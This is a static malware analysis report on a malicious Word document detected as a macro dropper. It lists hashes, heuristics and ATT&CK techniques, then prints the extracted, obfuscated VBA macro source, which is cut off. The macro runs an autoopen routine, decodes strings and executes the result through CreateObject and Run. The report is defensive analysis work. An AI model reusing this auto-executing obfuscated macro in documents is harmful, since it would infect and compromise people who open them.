Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ded3ca1703f22d4a…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 112.5 KB
Created: 2017-10-24 08:56:00
Authoring application: Microsoft Office Word
First seen: 2020-01-07
MD5: 9e28b928e114e890cdebf0318365a622
SHA-1: fb1b97c1fe8b896d943b41c84cb3aafa2f791bb9
SHA-256: ded3ca1703f22d4a8605d308192067466a886cba3369bc547e68f5021eff973e
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1140 Deobfuscate/Decode Files or Information

The sample is identified as malicious by ClamAV with the signature 'Doc.Dropper.Agent-6355509-0'. High-severity heuristics indicate the presence of VBA macros, specifically an 'autoopen' macro that calls 'CreateObject', suggesting it is designed to execute code. The VBA source itself is heavily obfuscated but contains functions that appear to perform string manipulation and execution, consistent with a dropper that downloads and runs a secondary payload. The 'autoopen' macro is a common initial-execution technique in malicious Office documents.

Heuristics (7)

  • ClamAV: Doc.Dropper.Agent-6355509-0 [critical, CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6355509-0
  • VBA macros detected [medium, 3 related findings, OLE_VBA_MACROS]
    Document contains VBA macro code
  • AutoOpen macro [high, OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • CreateObject call [high, OLE_VBA_CREATEOBJ]
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info, EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 5859 bytes
SHA-256: 5ee94c3a0f8fdf82b29fae22e225560ce477dc6baa9667015780178a98a6f843

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
Umktc
End Sub

Attribute VB_Name = "ayfglvtrk"
Function Jplhpm(Vdjre_mg)
myform1.TextBox2 = Vdjre_mg
End Function

Attribute VB_Name = "chvmy7"
Function dtrcdlo5()
dtrcdlo5 = myform1.alphabet
End Function

Attribute VB_Name = "fqtycqkwejpobl2"
Function bvrekcwsg()
bvrekcwsg = myform1.firstSymbol
End Function

Attribute VB_Name = "Hfcabliqgdfhff"
Function poqquwqognel()
Randomize
wiowbgi_avjbs5 = xlniwkfves_x5(9, 4) - 1
Pqbsebmxmny = xlniwkfves_x5(53, 1)
Htidcts_itsz8 = Qmeailks(bvrekcwsg, Pqbsebmxmny)
For Dcfh = 2 To wiowbgi_avjbs5
Pqbsebmxmny = xlniwkfves_x5(29, 1)
Htidcts_itsz8 = Htidcts_itsz8 + Qmeailks(Oxphu_uugmq, Pqbsebmxmny)
Next Dcfh
Pqbsebmxmny = xlniwkfves_x5(37, 1)
Htidcts_itsz8 = Htidcts_itsz8 + Qmeailks(Uo5, Pqbsebmxmny)
poqquwqognel = Htidcts_itsz8
End Function

Attribute VB_Name = "Jyajl"
Function Uo5()
Uo5 = UserForm1.lastSymbol
End Function

Attribute VB_Name = "Koqembtj"
Sub Umktc()
myform1.TextBox1 = "Ddtzdbxcu0"
End Sub

Attribute VB_Name = "myform1"
Attribute VB_Base = "0{A2DD401D-A86B-4860-AC85-0B73952D6ED5}{D13C3A34-8EB5-427B-B01D-BD4CBB3BABB1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox1_Change()
Deecqof = cbzazqslivheycp
olykxxv = cbzazqslivheycp
bxklsqmxnoqsfq9 = poqquwqognel
ludrjf = poqquwqognel

enc7 = ",uiounEmgoRxgh99Es/l"
enc8 = "yu.h;as/[Q]zE/cRxgh99Es/l"

Jplhpm (ycavimgbcbpjlv7(UserForm1.enc1) + Deecqof + ycavimgbcbpjlv7(UserForm2.enc2) + olykxxv + ycavimgbcbpjlv7(UserForm1.enc3) + olykxxv + ycavimgbcbpjlv7(UserForm2.enc4) + bxklsqmxnoqsfq9 + ycavimgbcbpjlv7(UserForm2.enc5) + bxklsqmxnoqsfq9 + ycavimgbcbpjlv7(UserForm2.enc6) + Deecqof + ycavimgbcbpjlv7(UserForm4.enc7_1) + ycavimgbcbpjlv7(enc7) + ycavimgbcbpjlv7(UserForm3.enc7_2) + Deecqof + ycavimgbcbpjlv7(UserForm4.enc7_1) + ycavimgbcbpjlv7(enc8) + ycavimgbcbpjlv7(UserForm4.enc9_1) + ludrjf + ycavimgbcbpjlv7(UserForm4.enc9) + ludrjf + ycavimgbcbpjlv7(myform1.enc10))

UserForm1.TextBox1 = "sulysxujs2"
End Sub

Attribute VB_Name = "ncrpcz_bpgjy"
Function Is9()
Is9 = Qpt1
End Function

Function Qpt1()
Qpt1 = ycavimgbcbpjlv7(UserForm3.myname)
End Function

Attribute VB_Name = "Nrtigxpjg"
Function Yzfboi5()
Yzfboi5 = UserForm3.middleSymbol1
End Function

Function Oxphu_uugmq()
Oxphu_uugmq = UserForm1.middleSymbol2
End Function

Attribute VB_Name = "Rqijmfqvjeglo"
Sub Vucsarwuank_l(Yzptipygrmofiak)
Yzptipygrmofiak.Run myform1.TextBox2, 0, True
End Sub

Attribute VB_Name = "ruilpgdiur"
Function ycavimgbcbpjlv7(O_krzklftm)
Snzkak = ""
Engzhcb_8 = Len(O_krzklftm)
For viokwrkirru7 = 1 To Engzhcb_8
Snzkak = Snzkak + Bdopsd(Qmeailks(O_krzklftm, viokwrkirru7), 4)
Next viokwrkirru7
ycavimgbcbpjlv7 = Snzkak
End Function

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{A8DACE64-2501-4CEF-B5E7-EF8490E7F0C7}{47F4AAD9-CCE4-48BC-8238-4386B90ADAF0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub TextBox1_Change()
Set vns4 = CreateObject(Is9)
Vucsarwuank_l vns4
End Sub

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{E320B391-1EC6-442C-8AEF-4AC5EAACBCAA}{CD42619A-9980-41A7-8C52-8100DC7D1136}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{A45BC617-CB03-4F3B-91DC-CF6E295F7439}{1DE19E32-EC80-4
... (truncated)